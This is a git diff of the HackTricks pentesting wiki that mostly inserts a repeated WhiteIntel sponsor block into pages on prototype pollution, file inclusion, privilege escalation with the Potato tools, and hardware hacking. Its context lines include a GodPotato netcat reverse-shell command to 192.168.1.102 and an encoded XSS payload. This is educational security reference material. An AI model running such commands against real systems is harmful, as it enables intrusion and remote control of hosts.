+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- # Summary @@ -98,6 +111,17 @@ javascript:alert(1)%252f%252f..%252fcss-images {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %} +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %}
diff --git a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md index 022fd82b8..8607aca12 100644 --- a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md +++ b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Serve XSS responses **For further details [take a look to the original reserach](https://portswigger.net/research/server-side-prototype-pollution)** @@ -134,6 +148,19 @@ You could definitely use it in a bug **chain** to exploit a **prototype pollutio * [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution) + +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md b/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md index f6d080706..ae316d556 100644 --- a/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md +++ b/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md @@ -14,6 +14,19 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- ## `compress.zlib://` and `PHP_STREAM_PREFER_STDIO` @@ -53,6 +66,17 @@ However, there is a check in the web server that **prevents loading files that c For more information check the description of the Race Condition and the CTF in [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %}
diff --git a/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md b/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md index 546d33f65..b48bf62b8 100644 --- a/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md +++ b/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md @@ -14,13 +14,27 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Vulnerable configuration **[Example from https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)** * PHP code: -``` +````h`
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-web/postmessage-vulnerabilities/README.md b/pentesting-web/postmessage-vulnerabilities/README.md index 62e9ba894..da4815365 100644 --- a/pentesting-web/postmessage-vulnerabilities/README.md +++ b/pentesting-web/postmessage-vulnerabilities/README.md @@ -16,6 +16,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Send **PostMessage** **PostMessage** uses the following function to send a message: @@ -232,6 +246,18 @@ For **more information**: * [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd) * To practice: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon) +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-web/registration-vulnerabilities.md b/pentesting-web/registration-vulnerabilities.md index 3c6b7146b..d9a877916 100644 --- a/pentesting-web/registration-vulnerabilities.md +++ b/pentesting-web/registration-vulnerabilities.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Registration Takeover ### Duplicate Registration @@ -191,6 +205,20 @@ JSON Web Token might be used to authenticate an user. * [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover) + +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-web/ssti-server-side-template-injection/el-expression-language.md b/pentesting-web/ssti-server-side-template-injection/el-expression-language.md index 3254b9ffd..233f0cbe4 100644 --- a/pentesting-web/ssti-server-side-template-injection/el-expression-language.md +++ b/pentesting-web/ssti-server-side-template-injection/el-expression-language.md @@ -12,6 +12,20 @@
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Bsic Info Expression Language (EL) is integral in JavaEE for bridging the presentation layer (e.g., web pages) and application logic (e.g., managed beans), enabling their interaction. It's predominantly used in: @@ -258,6 +272,18 @@ Check [https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https:// * [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools) * [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt) +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-web/unicode-injection/unicode-normalization.md b/pentesting-web/unicode-injection/unicode-normalization.md index 38b246a2f..8379c2ced 100644 --- a/pentesting-web/unicode-injection/unicode-normalization.md +++ b/pentesting-web/unicode-injection/unicode-normalization.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + **This is a summary of:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Check a look for further details (images taken form there). ## Understanding Unicode and Normalization @@ -115,6 +129,18 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* allows t * [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work) * [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html) +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/physical-attacks/physical-attacks.md b/physical-attacks/physical-attacks.md index 269865acb..1f534c9f3 100644 --- a/physical-attacks/physical-attacks.md +++ b/physical-attacks/physical-attacks.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## BIOS Password Recovery and System Security **Resetting the BIOS** can be achieved in several ways. Most motherboards include a **battery** that, when removed for around **30 minutes**, will reset the BIOS settings, including the password. Alternatively, a **jumper on the motherboard** can be adjusted to reset these settings by connecting specific pins. @@ -66,6 +80,18 @@ BitLocker encryption can potentially be bypassed if the **recovery password** is A new BitLocker recovery key can be added through social engineering tactics, convincing a user to execute a command that adds a new recovery key composed of zeros, thereby simplifying the decryption process. +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/todo/hardware-hacking/uart.md b/todo/hardware-hacking/uart.md index c19181a6e..c4cfe5607 100644 --- a/todo/hardware-hacking/uart.md +++ b/todo/hardware-hacking/uart.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Basic Information UART is a serial protocol, which means it transfers data between components one bit at a time. In contrast, parallel communication protocols transmit data simultaneously through multiple channels. Common serial protocols include RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express, and USB. @@ -191,6 +205,20 @@ This will list the possible contents from the EEPROM as per the signatures found Although, it is necessary to note that it's not always the case that the uboot is unlocked even if it is being used. If the Enter Key doesn't do anything, check for different keys like Space Key, etc. If the bootloader is locked and does not get interrupted, this method would not work. To check if uboot is the bootloader for the device, check the output on the UART Console while booting of the device. It might mention uboot while booting. + +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/windows-hardening/windows-local-privilege-escalation/access-tokens.md b/windows-hardening/windows-local-privilege-escalation/access-tokens.md index 1452642c0..5e0665a0f 100644 --- a/windows-hardening/windows-local-privilege-escalation/access-tokens.md +++ b/windows-hardening/windows-local-privilege-escalation/access-tokens.md @@ -12,6 +12,20 @@
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + ## Access Tokens Each **user logged** onto the system **holds an access token with security information** for that logon session. The system creates an access token when the user logs on. **Every process executed** on behalf of the user **has a copy of the access token**. The token identifies the user, the user's groups, and the user's privileges. A token also contains a logon SID (Security Identifier) that identifies the current logon session. @@ -117,6 +131,19 @@ Take a look to [**all the possible token privileges and some definitions on this Learn more about tokens in this tutorials: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) and [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962) + +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/windows-hardening/windows-local-privilege-escalation/juicypotato.md b/windows-hardening/windows-local-privilege-escalation/juicypotato.md index bb57d4404..f06402e2e 100644 --- a/windows-hardening/windows-local-privilege-escalation/juicypotato.md +++ b/windows-hardening/windows-local-privilege-escalation/juicypotato.md @@ -12,6 +12,20 @@
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + {% hint style="warning" %} **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_ {% endhint %} @@ -141,6 +155,18 @@ Then download [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/maste * [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md) +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md index dbde64174..2d73d35ba 100644 --- a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md +++ b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md @@ -14,6 +14,20 @@ Other ways to support HackTricks:
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} + +--- + {% hint style="warning" %} **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works. {% endhint %} @@ -82,6 +96,18 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" * [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato) * [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +{% embed url="https://whiteintel.io" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!